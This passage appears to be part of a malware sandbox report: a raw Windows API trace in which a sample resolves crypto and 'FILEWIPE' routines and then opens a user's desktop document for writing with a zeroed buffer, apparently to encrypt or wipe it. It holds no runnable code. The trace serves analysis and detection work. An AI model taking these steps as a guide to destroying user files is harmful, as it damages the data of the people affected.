wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.121] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.121] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.128] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.128] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.128] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.128] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.128] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.128] CryptDestroyKey (hKey=0x7c2200) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.129] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.129] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.129] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.129] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.129] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.129] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.129] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.129] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0032.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.130] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.130] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.130] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.130] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0032.130] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.131] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.131] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0032.131] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.131] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.134] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.134] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0032.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x2c0674d0, ftLastWriteTime.dwHighDateTime=0x1d5b605, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x0, dwReserved1=0x777648, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 0x7c2100 [0032.134] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.134] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.134] CharLowerBuffW (in: lpsz="byte[76167]", cchLength=0xb | out: lpsz="byte[76167]") returned 0xb [0032.135] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.135] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.135] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.135] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.135] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.135] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0032.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.136] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.136] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.136] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.137] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzgmnb4vwunbbj9.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0032.137] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.137] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.137] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.138] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.138] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.138] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.138] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.138] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.138] CharLowerBuffW (in: 